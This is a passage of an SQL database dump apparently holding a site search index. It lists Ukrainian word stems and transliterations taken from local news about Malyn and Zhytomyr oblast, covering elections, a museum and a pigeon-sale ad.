обласна',0,1,1.5333,'п000',1,'*'),(1563089,'прийняла обласна виборча','прийняла обласна виборча',0,1,1.8,'п000',1,'*'),(1563090,'рада','рада',0,0,0.2667,'р000',3,'*'),(1563091,'рада та','рада та',0,1,1.2333,'р000',1,'*'),(1563092,'рада та 2','рада та 2',0,1,1.3,'р000',1,'*'),(1563093,'рада та 7','рада та 7',0,1,1.3,'р000',1,'*'),(1563094,'ради і','ради і',0,1,1.2,'р000',2,'*'),(1563095,'ради і 5','ради і 5',0,1,1.2667,'р000',1,'*'),(1563096,'ради та 2','ради та 2',0,1,1.3,'р000',1,'*'),(1563097,'ради та 3','ради та 3',0,1,1.3,'р000',1,'*'),(1563098,'радомишльська','радомишльська',0,0,0.8667,'р000',1,'*'),(1563099,'радомишльська міська','радомишльська міська',0,1,1.6667,'р000',1,'*'),(1563100,'радомишльська міська рада','радомишльська міська рада',0,1,1.8333,'р000',1,'*'),(1563101,'район орієнтована','район орієнтована',0,1,1.5667,'р000',1,'*'),(1563102,'район орієнтована кількість','район орієнтована кількість',0,1,1.9,'р000',1,'*'),(1563103,'район с','район с',0,1,1.2333,'р000',1,'*'),(1563104,'район с вереси','район с вереси',0,1,1.4667,'р000',1,'*'),(1563105,'року зокрема','року зокрема',0,1,1.4,'р000',1,'*'),(1563106,'року зокрема округ','року зокрема округ',0,1,1.6,'р000',1,'*'),(1563107,'с вереси','с вереси',0,1,1.2667,'с000',1,'*'),(1563108,'с вереси орієнтована','с вереси орієнтована',0,1,1.6667,'с000',1,'*'),(1563109,'сільських','сільських',0,0,0.6,'с000',2,'*'),(1563110,'сільських отг','сільських отг',0,1,1.4333,'с000',1,'*'),(1563111,'сільських отг орієнтована','сільських отг орієнтована',0,1,1.8333,'с000',1,'*'),(1563112,'селищні','селищні',0,0,0.4667,'с000',1,'*'),(1563113,'селищні і','селищні і',0,1,1.3,'с000',1,'*'),(1563114,'селищні і 5','селищні і 5',0,1,1.3667,'с000',1,'*'),(1563115,'селищні і 7','селищні і 7',0,1,1.3667,'с000',1,'*'),(1563116,'селищні отг','селищні отг',0,1,1.3667,'с000',1,'*'),(1563117,'селищні отг орієнтована','селищні отг орієнтована',0,1,1.7667,'с000',1,'*'),(1563118,'селищних','селищних',0,0,0.5333,'с000',1,'*'),(1563119,'селищних та','селищних та',0,1,1.3667,'с000',1,'*'),(1563120,'селищних та 7','селищних та 7',0,1,1.4333,'с000',1,'*'),(1563121,'селищних та 8','селищних та 8',0,1,1.4333,'с000',1,'*'),(1563122,'та 2','та 2',0,1,1.1333,'т000',1,'*'),(1563123,'та 2 селищні','та 2 селищні',0,1,1.4,'т000',1,'*'),(1563124,'та 3','та 3',0,1,1.1333,'т000',1,'*'),(1563125,'та 3 селищні','та 3 селищні',0,1,1.4,'т000',1,'*'),(1563126,'та 7','та 7',0,1,1.1333,'т000',1,'*'),(1563127,'та 7 сільських','та 7 сільських',0,1,1.4667,'т000',1,'*'),(1563128,'та 7 селищних','та 7 селищних',0,1,1.4333,'т000',1,'*'),(1563129,'та 8','та 8',0,1,1.1333,'т000',1,'*'),(1563130,'та 8 сільських','та 8 сільських',0,1,1.4667,'т000',1,'*'),(1563131,'та андрушівська','та андрушівська',0,1,1.5,'т000',1,'*'),(1563132,'та андрушівська міські','та андрушівська міські',0,1,1.7333,'т000',1,'*'),(1563133,'та коростишівська','та коростишівська',0,1,1.5667,'т000',1,'*'),(1563134,'та коростишівська міські','та коростишівська міські',0,1,1.8,'т000',1,'*'),(1563135,'та овруцькі','та овруцькі',0,1,1.3667,'т000',1,'*'),(1563136,'та овруцькі міські','та овруцькі міські',0,1,1.6,'т000',1,'*'),(1563137,'утворено','утворено',0,0,0.5333,'у000',1,'*'),(1563138,'утворено 8','утворено 8',0,1,1.3333,'у000',1,'*'),(1563139,'утворено 8 виборчих','утворено 8 виборчих',0,1,1.6333,'у000',1,'*'),(1563140,'чуднівська','чуднівська',0,0,0.6667,'ч000',1,'*'),(1563141,'чуднівська та','чуднівська та',0,1,1.4333,'ч000',1,'*'),(1563142,'чуднівська та коростишівська','чуднівська та коростишівська',0,1,1.9333,'ч000',1,'*'),(1563377,'бердичів вінницю хмельник','бердичів вінницю хмельник',0,1,1.8333,'б000',1,'*'),(1563379,'вінницю хмельник','вінницю хмельник',0,1,1.5333,'в000',1,'*'),(1563389,'хмельник','хмельник',0,0,0.5333,'х000',2,'*'),(1563458,'2011','2011',0,0,0.4,'',1,'*'),(1563459,'2011 року','2011 року',0,1,1.3,'р000',1,'*'),(1563460,'2011 року є','2011 року є',0,1,1.3667,'р000',1,'*'),(1563461,'2452','2452',0,0,0.4,'',1,'*'),(1563462,'golub','golub',0,0,0.3333,'G410',2,'*'),(1563463,'golub poshtovij','golub poshtovij',0,1,1.5,'G412312',1,'*'),(1563464,'golub poshtovij samka','golub poshtovij samka',0,1,1.7,'G41231252',1,'*'),(1563465,'hjjwphpw8zm','hjjwphpw8zm',0,0,0.7333,'H2125',1,'*'),(1563466,'poshtovij','poshtovij',0,0,0.6,'P2312',1,'*'),(1563467,'poshtovij samka','poshtovij samka',0,1,1.5,'P231252',1,'*'),(1563468,'v hjjwphpw8zm','v hjjwphpw8zm',0,1,1.4333,'V2125',1,'*'),(1563469,'watch v hjjwphpw8zm','watch v hjjwphpw8zm',0,1,1.6333,'W3212125',1,'*'),(1563470,'вінницю овруч хмельник','вінницю овруч хмельник',0,1,1.7333,'в000',1,'*'),(1563471,'голуб','голуб',0,0,0.3333,'г000',3,'*'),(1563472,'голуб поштовий','голуб поштовий',0,1,1.4667,'г000',1,'*'),(1563473,'голуб поштовий самка','голуб поштовий самка',0,1,1.6667,'г000',1,'*'),(1563474,'наявності самка 2011','наявності самка 2011',0,1,1.6667,'н000',1,'*'),(1563475,'овруч хмельник','овруч хмельник',0,1,1.4667,'о000',1,'*'),(1563476,'овруч хмельник по','овруч хмельник по',0,1,1.5667,'о000',1,'*'),(1563477,'поштовий','поштовий',0,0,0.5333,'п000',1,'*'),(1563478,'поштовий самка','поштовий самка',0,1,1.4667,'п000',1,'*'),(1563479,'самка 2011','самка 2011',0,1,1.3333,'с000',1,'*'),(1563480,'самка 2011 року','самка 2011 року',0,1,1.5,'с000',1,'*'),(1563481,'хмельник по','хмельник по',0,1,1.3667,'х000',1,'*'),(1563482,'хмельник по 150','хмельник по 150',0,1,1.5,'х000',1,'*'),(1563615,'2470','2470',0,0,0.4,'',1,'*'),(1563616,'do','do',0,0,0.1333,'D000',4,'*'),(1563617,'do malinskoji','do malinskoji',0,1,1.4333,'D5452',2,'*'),(1563618,'do malinskoji miskoji','do malinskoji miskoji',0,1,1.7,'D545252',2,'*'),(1563619,'malinskoji','malinskoji',0,0,0.6667,'M452',3,'*'),(1563620,'malinskoji miskoji','malinskoji miskoji',0,1,1.6,'M45252',3,'*'),(1563621,'malinskoji miskoji radi','malinskoji miskoji radi',0,1,1.7667,'M4525263',3,'*'),(1563622,'miskoji radi','miskoji radi',0,1,1.4,'M263',3,'*'),(1563623,'okrugi','okrugi',0,0,0.4,'O262',1,'*'),(1563624,'okrugi po','okrugi po',0,1,1.3,'O2621',1,'*'),(1563625,'okrugi po viborakh','okrugi po viborakh',0,1,1.6,'O262162',1,'*'),(1563626,'po','po',0,0,0.1333,'P000',2,'*'),(1563627,'po viborakh','po viborakh',0,1,1.3667,'P620',1,'*'),(1563628,'po viborakh do','po viborakh do',0,1,1.4667,'P623',1,'*'),(1563629,'viborakh do','viborakh do',0,1,1.3667,'V623',1,'*'),(1563630,'viborakh do malinskoji','viborakh do malinskoji',0,1,1.7333,'V6235452',1,'*'),(1563631,'viborchi','viborchi',0,0,0.5333,'V620',1,'*'),(1563632,'viborchi okrugi','viborchi okrugi',0,1,1.5,'V6262',1,'*'),(1563633,'viborchi okrugi po','viborchi okrugi po',0,1,1.6,'V62621',1,'*'),(1563634,'виборах до','виборах до',0,1,1.3333,'в000',1,'*'),(1563635,'виборах до малинської','виборах до малинської',0,1,1.7,'в000',1,'*'),(1563636,'виборчі','виборчі',0,0,0.4667,'в000',1,'*'),(1563637,'виборчі округи','виборчі округи',0,1,1.4667,'в000',1,'*'),(1563638,'виборчі округи по','виборчі округи по',0,1,1.5667,'в000',1,'*'),(1563639,'до малинської','до малинської',0,1,1.4333,'д000',2,'*'),(1563640,'до малинської міської','до малинської міської',0,1,1.7,'д000',2,'*'),(1563641,'міської ради','міської ради',0,1,1.4,'м000',4,'*'),(1563642,'малинської','малинської',0,0,0.6667,'м000',4,'*'),(1563643,'малинської міської','малинської міської',0,1,1.6,'м000',4,'*'),(1563644,'малинської міської ради','малинської міської ради',0,1,1.7667,'м000',4,'*'),(1563645,'округи','округи',0,0,0.4,'о000',2,'*'),(1563646,'округи по','округи по',0,1,1.3,'о000',1,'*'),(1563647,'округи по виборах','округи по виборах',0,1,1.5667,'о000',1,'*'),(1563648,'по виборах','по виборах',0,1,1.3333,'п000',1,'*'),(1563649,'по виборах до','по виборах до',0,1,1.4333,'п000',1,'*'),(1564185,'rajonu','rajonu',0,0,0.4,'R250',1,'*'),(1564188,'shcho','shcho',0,0,0.3333,'S000',2,'*'),(1564249,'доріг','доріг',0,0,0.3333,'д000',1,'*'),(1564287,'комунальних','комунальних',0,0,0.7333,'к000',1,'*'),(1564288,'комунальних доріг','комунальних доріг',0,1,1.5667,'к000',1,'*'),(1564292,'людей','людей',0,0,0.3333,'л000',2,'*'),(1564295,'місцевих','місцевих',0,0,0.5333,'м000',1,'*'),(1564301,'малинського','малинського',0,0,0.7333,'м000',1,'*'),(1564302,'малинського району','малинського району',0,1,1.6,'м000',1,'*'),(1564328,'нашого','нашого',0,0,0.4,'н000',1,'*'),(1564383,'району','району',0,0,0.4,'р000',3,'*'),(1564394,'сіл','сіл',0,0,0.2,'с000',1,'*'),(1564436,'фінансування','фінансування',0,0,0.8,'ф000',1,'*'),(1564446,'яким','яким',0,0,0.2667,'я000',2,'*'),(1564734,'120 телефонуйте','120 телефонуйте',0,1,1.5,'т000',1,'*'),(1564735,'120 телефонуйте домовимось','120 телефонуйте домовимось',0,1,1.8667,'т000',1,'*'),(1564736,'2467','2467',0,0,0.4,'',1,'*'),(1564737,'4 молодих','4 молодих',0,1,1.3,'м000',1,'*'),(1564738,'4 молодих білих','4 молодих білих',0,1,1.5,'м000',1,'*'),(1564739,'foto fotohalereia poshtovi-bili','foto fotohalereia poshtovi-bili',0,1,2,'F3134612314',1,'*'),(1564740,'fotohalereia poshtovi-bili','fotohalereia poshtovi-bili',0,1,1.8667,'F34612314',1,'*'),(1564741,'molodi poshtovi bili','molodi poshtovi bili',0,1,1.6667,'M4312314',1,'*'),(1564742,'poshtovi bili','poshtovi bili',0,1,1.4333,'P2314',1,'*'),(1564743,'poshtovi-bili','poshtovi-bili',0,0,0.8667,'P2314',1,'*'),(1564744,'білих','білих',0,0,0.3333,'б000',1,'*'),(1564745,'білих 2020','білих 2020',0,1,1.3333,'б000',1,'*'),(1564746,'білих 2020 року','білих 2020 року',0,1,1.5,'б000',1,'*'),(1564747,'в наявності 4','в наявності 4',0,1,1.4333,'в000',1,'*'),(1564748,'вінницю хмельник овруч','вінницю хмельник овруч',0,1,1.7333,'в000',1,'*'),(1564749,'молоді поштові білі','молоді поштові білі',0,1,1.6333,'м000',1,'*'),(1564750,'молодих білих','молодих білих',0,1,1.4333,'м000',1,'*'),(1564751,'молодих білих 2020','молодих білих 2020',0,1,1.6,'м000',1,'*'),(1564752,'наявності 4','наявності 4',0,1,1.3667,'н000',1,'*'),(1564753,'наявності 4 молодих','наявності 4 молодих',0,1,1.6333,'н000',1,'*'),(1564754,'овруч ціна','овруч ціна',0,1,1.3333,'о000',3,'*'),(1564755,'овруч ціна 120','овруч ціна 120',0,1,1.4667,'о000',1,'*'),(1564756,'поштові білі','поштові білі',0,1,1.4,'п000',1,'*'),(1564757,'хмельник овруч','хмельник овруч',0,1,1.4667,'х000',1,'*'),(1564758,'хмельник овруч ціна','хмельник овруч ціна',0,1,1.6333,'х000',1,'*'),(1564759,'ціна 120','ціна 120',0,1,1.2667,'ц000',1,'*'),(1564760,'ціна 120 телефонуйте','ціна 120 телефонуйте',0,1,1.6667,'ц000',1,'*'),(1564827,'2472','2472',0,0,0.4,'',1,'*'),(1564828,'nezabarom','nezabarom',0,0,0.6,'N2165',1,'*'),(1564829,'nezabarom novi','nezabarom novi',0,1,1.4667,'N21651',1,'*'),(1564830,'nezabarom novi realijiji','nezabarom novi realijiji',0,1,1.8,'N21651642',1,'*'),(1564831,'novi','novi',0,0,0.2667,'N100',1,'*'),(1564832,'novi realijiji','novi realijiji',0,1,1.4667,'N1642',1,'*'),(1564833,'novi realijiji malinshchini','novi realijiji malinshchini',0,1,1.9,'N164254525',1,'*'),(1564834,'realijiji','realijiji',0,0,0.6,'R420',1,'*'),(1564835,'realijiji malinshchini','realijiji malinshchini',0,1,1.7333,'R4254525',1,'*'),(1564836,'незабаром','незабаром',0,0,0.6,'н000',1,'*'),(1564837,'незабаром нові','незабаром нові',0,1,1.4667,'н000',1,'*'),(1564838,'незабаром нові реалії','незабаром нові реалії',0,1,1.7,'н000',1,'*'),(1564839,'нові','нові',0,0,0.2667,'н000',1,'*'),(1564840,'нові реалії','нові реалії',0,1,1.3667,'н000',1,'*'),(1564841,'нові реалії малинщини','нові реалії малинщини',0,1,1.7,'н000',1,'*'),(1564842,'реалії','реалії',0,0,0.4,'р000',1,'*'),(1564843,'реалії малинщини','реалії малинщини',0,1,1.5333,'р000',1,'*'),(1564858,'2473','2473',0,0,0.4,'',1,'*'),(1564859,'kraeznavchij','kraeznavchij',0,0,0.8,'K62512',1,'*'),(1564860,'kraeznavchij muzej','kraeznavchij muzej',0,1,1.6,'K6251252',1,'*'),(1564861,'kraeznavchij muzej turistichna','kraeznavchij muzej turistichna',0,1,2,'K6251252362325',1,'*'),(1564862,'malinom','malinom',0,0,0.4667,'M450',2,'*'),(1564863,'malinskij','malinskij',0,0,0.6,'M452',2,'*'),(1564864,'malinskij miskij','malinskij miskij',0,1,1.5333,'M45252',1,'*'),(1564865,'malinskij miskij kraeznavchij','malinskij miskij kraeznavchij',0,1,1.9667,'M4525262512',1,'*'),(1564866,'mandrivka','mandrivka',0,0,0.6,'M3612',1,'*'),(1564867,'mandrivka malinom','mandrivka malinom',0,1,1.5667,'M3612545',1,'*'),(1564868,'miskij','miskij',0,0,0.4,'M200',1,'*'),(1564869,'miskij kraeznavchij','miskij kraeznavchij',0,1,1.6333,'M262512',1,'*'),(1564870,'miskij kraeznavchij muzej','miskij kraeznavchij muzej',0,1,1.8333,'M26251252',1,'*'),(1564871,'muzej','muzej',0,0,0.3333,'M200',1,'*'),(1564872,'muzej turistichna','muzej turistichna',0,1,1.5667,'M2362325',1,'*'),(1564873,'muzej turistichna mandrivka','muzej turistichna mandrivka',0,1,1.9,'M23623253612',1,'*'),(1564874,'turistichna','turistichna',0,0,0.7333,'T62325',1,'*'),(1564875,'turistichna mandrivka','turistichna mandrivka',0,1,1.7,'T623253612',1,'*'),(1564876,'turistichna mandrivka malinom','turistichna mandrivka malinom',0,1,1.9667,'T623253612545',1,'*'),(1564877,'краєзнавчий','краєзнавчий',0,0,0.7333,'к000',1,'*'),(1564878,'краєзнавчий музей','краєзнавчий музей',0,1,1.5667,'к000',1,'*'),(1564879,'краєзнавчий музей туристична','краєзнавчий музей туристична',0,1,1.9333,'к000',1,'*'),(1564880,'міський','міський',0,0,0.4667,'м000',2,'*'),(1564881,'міський краєзнавчий','міський краєзнавчий',0,1,1.6333,'м000',1,'*'),(1564882,'міський краєзнавчий музей','міський краєзнавчий музей',0,1,1.8333,'м000',1,'*'),(1564883,'малином','малином',0,0,0.4667,'м000',2,'*'),(1564884,'малинський','малинський',0,0,0.6667,'м000',3,'*'),(1564885,'малинський міський','малинський міський',0,1,1.6,'м000',1,'*'),(1564886,'малинський міський краєзнавчий','малинський міський краєзнавчий',0,1,2,'м000',1,'*'),(1564887,'мандрівка','мандрівка',0,0,0.6,'м000',1,'*'),(1564888,'мандрівка малином','мандрівка малином',0,1,1.5667,'м000',1,'*'),(1564889,'музей','музей',0,0,0.3333,'м000',1,'*'),(1564890,'музей туристична','музей туристична',0,1,1.5333,'м000',1,'*'),(1564891,'музей туристична мандрівка','музей туристична мандрівка',0,1,1.8667,'м000',1,'*'),(1564892,'туристична','туристична',0,0,0.6667,'т000',1,'*'),(1564893,'туристична мандрівка','туристична мандрівка',0,1,1.6667,'т000',1,'*'),(1564894,'туристична мандрівка малином','туристична мандрівка малином',0,1,1.9333,'т000',1,'*'),(1564926,'громад','громад',0,0,0.4,'г000',1,'*'),(1564931,'новостворених','новостворених',0,0,0.8667,'н000',1,'*'),(1564940,'себе','себе',0,0,0.2667,'с000',3,'*'),(1565333,'2475','2475',0,0,0.4,'',1,'*'),(1565334,'34 deputskikh','34 deputskikh',0,1,1.4333,'D132',1,'*'),(1565335,'34 deputskikh mandati','34 deputskikh mandati',0,1,1.7,'D13253',1,'*'),(1565336,'34 депутатських','34 депутатських',0,1,1.5,'д000',1,'*'),(1565337,'34 депутатських мандати','34 депутатських мандати',0,1,1.7667,'д000',1,'*'),(1565338,'352','352',0,0,0.3,'',1,'*'),(1565339,'352 kandidati','352 kandidati',0,1,1.4333,'K530',1,'*'),(1565340,'352 kandidati na','352 kandidati na',0,1,1.5333,'K535',1,'*'),(1565341,'352 кандидати','352 кандидати',0,1,1.4333,'к000',1,'*'),(1565342,'352 кандидати на','352 кандидати на',0,1,1.5333,'к000',1,'*'),(1565343,'deputskikh','deputskikh',0,0,0.6667,'D132',1,'*'),(1565344,'deputskikh mandati','deputskikh mandati',0,1,1.6,'D13253',1,'*'),(1565345,'deputskikh mandati u','deputskikh mandati u',0,1,1.6667,'D13253',1,'*'),(1565346,'kandidati','kandidati',0,0,0.6,'K530',1,'*'),(1565347,'kandidati na','kandidati na',0,1,1.4,'K535',1,'*'),(1565348,'kandidati na 34','kandidati na 34',0,1,1.5,'K535',1,'*'),(1565349,'korostenskogo','korostenskogo',0,0,0.8667,'K62352',1,'*'),(1565350,'korostenskogo rajonu','korostenskogo rajonu',0,1,1.6667,'K62352625',1,'*'),(1565351,'korostenskogo rajonu zhitomirskoji','korostenskogo rajonu zhitomirskoji',0,1,2,'K6235262523562',1,'*'),(1565352,'malinsku','malinsku',0,0,0.5333,'M452',1,'*'),(1565353,'malinsku misku','malinsku misku',0,1,1.4667,'M45252',1,'*'),(1565354,'malinsku misku radu','malinsku misku radu',0,1,1.6333,'M4525263',1,'*'),(1565355,'mandati','mandati',0,0,0.4667,'M300',1,'*'),(1565356,'mandati u','mandati u',0,1,1.3,'M300',1,'*'),(1565357,'mandati u malinsku','mandati u malinsku',0,1,1.6,'M35452',1,'*'),(1565358,'misku','misku',0,0,0.3333,'M200',1,'*'),(1565359,'misku radu','misku radu',0,1,1.3333,'M263',1,'*'),(1565360,'misku radu korostenskogo','misku radu korostenskogo',0,1,1.8,'M263262352',1,'*'),(1565361,'na 34','na 34',0,1,1.1667,'N000',1,'*'),(1565362,'na 34 deputskikh','na 34 deputskikh',0,1,1.5333,'N3132',1,'*'),(1565363,'radu','radu',0,0,0.2667,'R300',1,'*'),(1565364,'radu korostenskogo','radu korostenskogo',0,1,1.6,'R3262352',1,'*'),(1565365,'radu korostenskogo rajonu','radu korostenskogo rajonu',0,1,1.8333,'R3262352625',1,'*'),(1565366,'rajonu zhitomirskoji','rajonu zhitomirskoji',0,1,1.6667,'R2523562',1,'*'),(1565367,'rajonu zhitomirskoji oblasti','rajonu zhitomirskoji oblasti',0,1,1.9333,'R25235621423',1,'*'),(1565368,'u malinsku','u malinsku',0,1,1.3333,'U5452',1,'*'),(1565369,'u malinsku misku','u malinsku misku',0,1,1.5333,'U545252',1,'*'),(1565370,'zareestrovano','zareestrovano',0,0,0.8667,'Z623615',1,'*'),(1565371,'zareestrovano 352','zareestrovano 352',0,1,1.5667,'Z623615',1,'*'),(1565372,'zareestrovano 352 kandidati','zareestrovano 352 kandidati',0,1,1.9,'Z623615253',1,'*'),(1565373,'zhitomirskoji','zhitomirskoji',0,0,0.8667,'Z3562',5,'*'),(1565374,'zhitomirskoji oblasti','zhitomirskoji oblasti',0,1,1.7,'Z35621423',5,'*'),(1565375,'депутатських','депутатських',0,0,0.8,'д000',2,'*'),(1565376,'депутатських мандати','депутатських мандати',0,1,1.6667,'д000',1,'*'),(1565377,'депутатських мандати у','депутатських мандати у',0,1,1.7333,'д000',1,'*'),(1565378,'житомирської області','житомирської області',0,1,1.6667,'ж000',6,'*'),(1565379,'зареєстровано','зареєстровано',0,0,0.8667,'з000',1,'*'),(1565380,'зареєстровано 352','зареєстровано 352',0,1,1.5667,'з000',1,'*'),(1565381,'зареєстровано 352 кандидати','зареєстровано 352 кандидати',0,1,1.9,'з000',1,'*'),(1565382,'кандидати','кандидати',0,0,0.6,'к000',3,'*'),(1565383,'кандидати на','кандидати на',0,1,1.4,'к000',1,'*'),(1565384,'кандидати на 34','кандидати на 34',0,1,1.5,'к000',1,'*'),(1565385,'коростенського','коростенського',0,0,0.9333,'к000',1,'*'),(1565386,'коростенського району','коростенського району',0,1,1.7,'к000',1,'*'),(1565387,'коростенського району житомирської','коростенського району житомирської',0,1,2,'к000',1,'*'),(1565388,'міську','міську',0,0,0.4,'м000',2,'*'),(1565389,'міську раду','міську раду',0,1,1.3667,'м000',2,'*'),(1565390,'міську раду коростенського','міську раду коростенського',0,1,1.8667,'м000',1,'*'),(1565391,'малинську','малинську',0,0,0.6,'м000',1,'*'),(1565392,'малинську міську','малинську міську',0,1,1.5333,'м000',1,'*'),(1565393,'малинську міську раду','малинську міську раду',0,1,1.7,'м000',1,'*'),(1565394,'мандати','мандати',0,0,0.4667,'м000',1,'*'),(1565395,'мандати у','мандати у',0,1,1.3,'м000',1,'*'),(1565396,'мандати у малинську','мандати у малинську',0,1,1.6333,'м000',1,'*'),(1565397,'на 34','на 34',0,1,1.1667,'н000',1,'*'),(1565398,'на 34 депутатських','на 34 депутатських',0,1,1.6,'н000',1,'*'),(1565399,'раду','раду',0,0,0.2667,'р000',2,'*'),(1565400,'раду коростенського','раду коростенського',0,1,1.6333,'р000',1,'*'),(1565401,'раду коростенського району','раду коростенського району',0,1,1.8667,'р000',1,'*'),(1565402,'району житомирської','району житомирської',0,1,1.6333,'р000',1,'*'),(1565403,'району житомирської області','району житомирської області',0,1,1.9,'р000',1,'*'),(1565404,'у малинську','у малинську',0,1,1.3667,'у000',1,'*'),(1565405,'у малинську міську','у малинську міську',0,1,1.6,'у000',1,'*'),(1568186,'виборчий','виборчий',0,0,0.5333,'в000',3,'*'),(1568280,'марія','марія',0,0,0.3333,'м000',4,'*'),(1568588,'2477','2477',0,0,0.4,'',1,'*'),(1568589,'byuleten','byuleten',0,0,0.5333,'B435',1,'*'),(1568590,'pravilno','pravilno',0,0,0.5333,'P6145',1,'*'),(1568591,'pravilno zapovniti','pravilno zapovniti',0,1,1.6,'P61452153',1,'*'),(1568592,'pravilno zapovniti viborchij','pravilno zapovniti viborchij',0,1,1.9333,'P61452153162',1,'*'),(1568593,'tsvk yak','tsvk yak',0,1,1.2667,'T212',1,'*'),(1568594,'tsvk yak pravilno','tsvk yak pravilno',0,1,1.5667,'T21216145',1,'*'),(1568595,'viborchij','viborchij',0,0,0.6,'V620',1,'*'),(1568596,'viborchij byuleten','viborchij byuleten',0,1,1.6,'V621435',1,'*'),(1568597,'yak','yak',0,0,0.2,'Y200',2,'*'),(1568598,'yak pravilno','yak pravilno',0,1,1.4,'Y216145',1,'*'),(1568599,'yak pravilno zapovniti','yak pravilno zapovniti',0,1,1.7333,'Y2161452153',1,'*'),(1568600,'zapovniti','zapovniti',0,0,0.6,'Z153',1,'*'),(1568601,'zapovniti viborchij','zapovniti viborchij',0,1,1.6333,'Z153162',1,'*'),(1568602,'zapovniti viborchij byuleten','zapovniti viborchij byuleten',0,1,1.9333,'Z1531621435',1,'*'),(1568603,'бюлетень','бюлетень',0,0,0.5333,'б000',1,'*'),(1568604,'виборчий бюлетень','виборчий бюлетень',0,1,1.5667,'в000',1,'*'),(1568605,'заповнити','заповнити',0,0,0.6,'з000',1,'*'),(1568606,'заповнити виборчий','заповнити виборчий',0,1,1.6,'з000',1,'*'),(1568607,'заповнити виборчий бюлетень','заповнити виборчий бюлетень',0,1,1.9,'з000',1,'*'),(1568608,'правильно','правильно',0,0,0.6,'п000',1,'*'),(1568609,'правильно заповнити','правильно заповнити',0,1,1.6333,'п000',1,'*'),(1568610,'правильно заповнити виборчий','правильно заповнити виборчий',0,1,1.9333,'п000',1,'*'),(1568611,'цвк як','цвк як',0,1,1.2,'ц000',1,'*'),(1568612,'цвк як правильно','цвк як правильно',0,1,1.5333,'ц000',1,'*'),(1568613,'як','як',0,0,0.1333,'я000',10,'*'),(1568614,'як правильно','як правильно',0,1,1.4,'я000',1,'*'),(1568615,'як правильно заповнити','як правильно заповнити',0,1,1.7333,'я000',1,'*'),(1569254,'-2.pdf','-2.pdf',0,0,0.4,'P310',1,'*'),(1569255,'-2.pdf зверніть','-2.pdf зверніть',0,1,1.5,'P310',1,'*'),(1569256,'-2.pdf зверніть увагу','-2.pdf зверніть увагу',0,1,1.7,'P310',1,'*'),(1569257,'10 atlas','10 atlas',0,1,1.2667,'A342',1,'*'),(1569258,'10 atlas novogo','10 atlas novogo',0,1,1.5,'A342512',1,'*'),(1569259,'2020 10','2020 10',0,1,1.2333,'',1,'*'),(1569260,'2020 10 atlas','2020 10 atlas',0,1,1.4333,'A342',1,'*'),(1569261,'2020 elektronna','2020 elektronna',0,1,1.5,'E42365',1,'*'),(1569262,'2020 elektronna versiya','2020 elektronna versiya',0,1,1.7667,'E42365162',1,'*'),(1569263,'2478','2478',0,0,0.4,'',1,'*'),(1569264,'administrativno','administrativno',0,0,1,'A35236315',1,'*'),(1569265,'administrativno teritorialnogo','administrativno teritorialnogo',0,1,2,'A352363153636452',1,'*'),(1569266,'administrativno teritorialnogo ustroyu','administrativno teritorialnogo ustroyu',0,1,2,'A35236315363645236',1,'*'),(1569267,'atlas','atlas',0,0,0.3333,'A342',1,'*'),(1569268,'atlas administrativno','atlas administrativno',0,1,1.7,'A34235236315',1,'*'),(1569269,'atlas administrativno teritorialnogo','atlas administrativno teritorialnogo',0,1,2,'A342352363153636452',1,'*'),(1569270,'atlas novogo','atlas novogo',0,1,1.4,'A342512',1,'*'),(1569271,'atlas novogo atu','atlas novogo atu',0,1,1.5333,'A3425123',1,'*'),(1569272,'atu','atu',0,0,0.2,'A300',1,'*'),(1569273,'atu 2020','atu 2020',0,1,1.2667,'A300',1,'*'),(1569274,'atu 2020 elektronna','atu 2020 elektronna',0,1,1.6333,'A342365',1,'*'),(1569275,'elektronna','elektronna',0,0,0.6667,'E42365',1,'*'),(1569276,'elektronna versiya','elektronna versiya',0,1,1.6,'E42365162',1,'*'),(1569277,'elektronna versiya -2.pdf','elektronna versiya -2.pdf',0,1,1.8333,'E42365162131',1,'*'),(1569278,'gov','gov',0,0,0.2,'G100',1,'*'),(1569279,'gov ua','gov ua',0,1,1.2,'G100',1,'*'),(1569280,'gov ua wp-content','gov ua wp-content',0,1,1.5667,'G125353',1,'*'),(1569281,'https www minregion','https www minregion',0,1,1.6333,'H3125625',1,'*'),(1569282,'minregion','minregion',0,0,0.6,'M625',1,'*'),(1569283,'minregion gov','minregion gov',0,1,1.4333,'M62521',1,'*'),(1569284,'minregion gov ua','minregion gov ua',0,1,1.5333,'M62521',1,'*'),(1569285,'novogo','novogo',0,0,0.4,'N120',1,'*'),(1569286,'novogo atu','novogo atu',0,1,1.3333,'N123',1,'*'),(1569287,'novogo atu 2020','novogo atu 2020',0,1,1.5,'N123',1,'*'),(1569288,'teritorialnogo','teritorialnogo',0,0,0.9333,'T636452',1,'*'),(1569289,'teritorialnogo ustroyu','teritorialnogo ustroyu',0,1,1.7333,'T63645236',1,'*'),(1569290,'teritorialnogo ustroyu ukrajini','teritorialnogo ustroyu ukrajini',0,1,2,'T636452362625',1,'*'),(1569291,'ua wp-content','ua wp-content',0,1,1.4333,'U125353',1,'*'),(1569292,'ua wp-content uploads','ua wp-content uploads',0,1,1.7,'U1253531432',1,'*'),(1569293,'ukrajini','ukrajini',0,0,0.5333,'U2625',4,'*'),(1569294,'uploads','uploads',0,0,0.4667,'U1432',1,'*'),(1569295,'uploads 2020','uploads 2020',0,1,1.4,'U1432',1,'*'),(1569296,'uploads 2020 10','uploads 2020 10',0,1,1.5,'U1432',1,'*'),(1569297,'ustroyu','ustroyu',0,0,0.4667,'U236',1,'*'),(1569298,'ustroyu ukrajini','ustroyu ukrajini',0,1,1.5333,'U2362625',1,'*'),(1569299,'versiya','versiya',0,0,0.4667,'V620',1,'*'),(1569300,'versiya -2.pdf','versiya -2.pdf',0,1,1.4667,'V62131',1,'*'),(1569301,'versiya -2.pdf зверніть','versiya -2.pdf зверніть',0,1,1.7667,'V62131',1,'*'),(1569302,'wp-content','wp-content',0,0,0.6667,'W125353',1,'*'),(1569303,'wp-content uploads','wp-content uploads',0,1,1.6,'W1253531432',1,'*'),(1569304,'wp-content uploads 2020','wp-content uploads 2020',0,1,1.7667,'W1253531432',1,'*'),(1569305,'www minregion','www minregion',0,1,1.4333,'W5625',1,'*'),(1569306,'www minregion gov','www minregion gov',0,1,1.5667,'W562521',1,'*'),(1569307,'інформацію','інформацію',0,0,0.6667,'і000',2,'*'),(1569308,'інформацію щодо','інформацію щодо',0,1,1.5,'і000',1,'*'),(1569309,'інформацію щодо нового','інформацію щодо нового',0,1,1.7333,'і000',1,'*'),(1569310,'адміністративно-територіального','адміністративно-територіального',0,0,1,'а000',1,'*'),(1569311,'адміністративно-територіального 